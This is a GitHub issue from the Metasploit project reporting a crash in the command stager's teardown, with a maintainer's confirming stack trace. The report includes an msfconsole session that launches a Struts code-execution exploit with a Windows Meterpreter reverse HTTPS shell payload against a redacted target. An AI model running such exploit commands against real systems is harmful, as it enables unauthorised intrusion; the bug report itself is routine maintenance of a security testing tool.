Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

cmdstager: NoMethodError undefined method `stop' for nil:NilClass #4156

Closed
hatRiot opened this issue Nov 8, 2014 · 1 comment · Fixed by #4160
Closed

cmdstager: NoMethodError undefined method `stop' for nil:NilClass #4156

hatRiot opened this issue Nov 8, 2014 · 1 comment · Fixed by #4160
Assignees
Labels

Comments

@hatRiot
Copy link

hatRiot commented Nov 8, 2014

$ msfconsole -v
Framework Version: 4.10.0-2014102901
msf > use exploit/multi/http/struts_code_exec
[...]
msf exploit(struts_code_exec) > set PAYLOAD windows/meterpreter/reverse_https
[...]
msf exploit(struts_code_exec) > exploit

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Sending request to [redacted]
[*] Command Stager progress -  59.09% done (26/44 bytes)
[*] Command Stager progress - 100.00% done (44/44 bytes)
[-] Exploit failed: NoMethodError undefined method `stop' for nil:NilClass
msf exploit(struts_code_exec) > 

Tested with a few different payloads; failure point seems to be somewhere in execute_cmdstager({ :temp => '.' }) teardown.

@wchen-r7
Copy link
Contributor

wchen-r7 commented Nov 9, 2014

Confirmed bug:

[11/09/2014 13:54:10] [e(0)] core: Exploit failed (multi/http/struts_code_exec): NoMethodError undefined method `stop' for nil:NilClass
[11/09/2014 13:54:10] [d(3)] core: Call stack:
msf/lib/rex/exploitation/cmdstager/tftp.rb:41:in `teardown'
msf/lib/msf/core/exploit/cmdstager.rb:97:in `execute_cmdstager'
msf/modules/exploits/multi/http/struts_code_exec.rb:93:in `windows_stager'
msf/modules/exploits/multi/http/struts_code_exec.rb:145:in `exploit'
msf/lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
msf/lib/msf/core/exploit_driver.rb:166:in `run'
msf/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
msf/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
msf/lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
msf/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
msf/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
msf/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
msf/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
msf/lib/rex/ui/text/shell.rb:200:in `run'
msf/lib/metasploit/framework/command/console.rb:30:in `start'
msf/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants